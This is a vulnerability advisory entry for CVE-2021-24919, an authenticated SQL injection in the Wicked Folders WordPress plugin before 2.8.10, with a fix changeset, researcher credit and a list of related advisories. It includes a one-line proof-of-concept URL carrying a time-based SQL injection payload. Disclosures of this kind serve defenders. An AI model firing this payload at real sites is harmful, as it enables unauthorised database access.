Wicked Folders < 2.8.10 – Subscriber+ SQL Injection | CVE 2021-24919 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the folder_id parameter before using it in a SQL statement in the wicked_folders_save_sort_order AJAX action, available to any authenticated user. leading to an SQL injection

Proof of Concept

As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=wicked_folders_save_sort_order&folder_id=-1%20UNION%20(SELECT%2042,42,42%20FROM%20(SELECT(SLEEP(5)))b)%20--

Affects Plugins

Fixed in 2.8.10

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2651221

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

f472ec7d-765c-4266-ab9c-e2d06703ebb4

Timeline

Publicly Published

2022-01-03 (about 3 years ago)

Added

2022-01-03 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2025-07-03

Title

Paid Member Subscriptions < 2.15.2 - Unauthenticated SQL Injection

Published

2025-06-27

Title

YaySMTP < 2.6.7 - Admin+ SQL Injection

Published

2024-03-26

Title

Zoho Campaigns < 2.0.7 - Authenticated (Contributor+) SQL Injection

Published

2024-12-05

Title

KiviCare – Clinic & Patient Management System (EHR) < 3.6.5 - Unauthenticated SQL Injection

Published

2014-08-01

Title

Super CAPTCHA <= 2.2.4 - SQL Injection